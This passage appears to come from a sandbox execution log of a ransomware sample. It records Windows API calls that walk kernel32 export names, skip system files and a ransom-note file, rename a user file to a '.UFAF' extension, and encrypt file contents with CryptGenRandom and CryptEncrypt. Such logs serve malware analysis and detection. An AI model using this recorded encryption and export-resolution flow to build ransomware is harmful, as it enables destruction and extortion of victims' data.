lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.639] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.639] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.639] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.639] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.639] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.639] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.639] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.639] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.639] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.639] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.639] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.639] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.639] lstrlenA (lpString="DELETEATOM") returned 10 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.639] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.639] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.639] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.640] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.640] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.640] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.640] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.640] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.640] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.640] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.640] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.640] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.640] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.640] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.640] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.640] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.640] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.640] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.640] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.640] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.640] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.640] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.640] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.640] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.640] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.640] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.640] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.640] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.640] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.640] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.640] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.640] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.640] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.640] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.640] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.640] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.640] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.640] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.641] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.641] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.641] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.641] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.641] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.641] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.641] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.641] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.641] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.641] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.641] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.641] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.641] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.641] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.641] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.641] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.641] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.641] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.641] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.642] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.642] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.642] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.642] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.642] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.642] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S-Py95c3wNN.mkv") returned 53 [0083.642] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S-Py95c3wNN.mkv.UFAF") returned 58 [0083.642] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S-Py95c3wNN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s-py95c3wnn.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S-Py95c3wNN.mkv.UFAF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s-py95c3wnn.mkv.ufaf"), dwFlags=0x0) returned 1 [0083.643] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.643] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.643] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.643] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8812a0, ftCreationTime.dwHighDateTime=0x1d4cb34, ftLastAccessTime.dwLowDateTime=0x564a2710, ftLastAccessTime.dwHighDateTime=0x1d4d441, ftLastWriteTime.dwLowDateTime=0x564a2710, ftLastWriteTime.dwHighDateTime=0x1d4d441, nFileSizeHigh=0x0, nFileSizeLow=0x18443, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY32Gl.swf", cAlternateFileName="")) returned 1 [0083.643] lstrcmpiW (lpString1="vY32Gl.swf", lpString2="DECRYPT-FILES.txt") returned 1 [0083.643] lstrcmpiW (lpString1="vY32Gl.swf", lpString2="autorun.inf") returned 1 [0083.643] lstrcmpiW (lpString1="vY32Gl.swf", lpString2="boot.ini") returned 1 [0083.644] lstrcmpiW (lpString1="vY32Gl.swf", lpString2="desktop.ini") returned 1 [0083.644] lstrcmpiW (lpString1="vY32Gl.swf", lpString2="ntuser.dat") returned 1 [0083.644] lstrcmpiW (lpString1="vY32Gl.swf", lpString2="iconcache.db") returned 1 [0083.644] lstrcmpiW (lpString1="vY32Gl.swf", lpString2="bootsect.bak") returned 1 [0083.644] lstrcmpiW (lpString1="vY32Gl.swf", lpString2="ntuser.dat.log") returned 1 [0083.644] lstrcmpiW (lpString1="vY32Gl.swf", lpString2="thumbs.db") returned 1 [0083.644] lstrcmpiW (lpString1="vY32Gl.swf", lpString2="Bootfont.bin") returned 1 [0083.644] lstrlenW (lpString="vY32Gl.swf") returned 10 [0083.644] lstrcmpiW (lpString1="swf", lpString2="lnk") returned 1 [0083.644] lstrcmpiW (lpString1="swf", lpString2="exe") returned 1 [0083.644] lstrcmpiW (lpString1="swf", lpString2="sys") returned -1 [0083.644] lstrcmpiW (lpString1="swf", lpString2="dll") returned 1 [0083.644] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0083.644] lstrlenW (lpString="vY32Gl.swf") returned 10 [0083.644] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0083.644] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="vY32Gl.swf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vY32Gl.swf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vY32Gl.swf" [0083.644] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vY32Gl.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vy32gl.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0083.645] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=99395) returned 1 [0083.645] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0083.645] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.645] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.645] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.645] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.645] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.645] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.647] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.647] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.648] CloseHandle (hObject=0x414) returned 1 [0083.648] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.648] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.649] CloseHandle (hObject=0x0) returned 0 [0083.649] CloseHandle (hObject=0x410) returned 1 [0083.649] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.649] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.650] GetTickCount () returned 0x114d614 [0083.650] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.650] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.650] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.650] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.650] lstrlenA (lpString="kernel32.dll") returned 12 [0083.651] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.651] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.651] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.651] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.651] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.651] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.651] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.651] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.651] lstrlenA (lpString="ADDATOMA") returned 8 [0083.651] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.651] lstrlenA (lpString="ADDATOMW") returned 8 [0083.651] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.651] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.651] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.651] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.651] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.651] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.651] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.651] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.651] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.651] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.651] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.651] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.651] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.651] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.651] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.651] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.651] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.651] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.651] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.651] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.651] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.652] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.652] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.652] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.652] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.652] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.652] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.652] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.652] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.652] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.652] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.652] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.652] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.652] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.652] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.652] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.652] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.652] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.652] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.652] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.652] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.652] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.652] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.652] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.652] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.652] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.652] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.652] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.652] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.652] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.652] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.652] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.652] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.652] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.652] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.652] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.653] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.653] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.653] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.653] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.653] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.653] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") 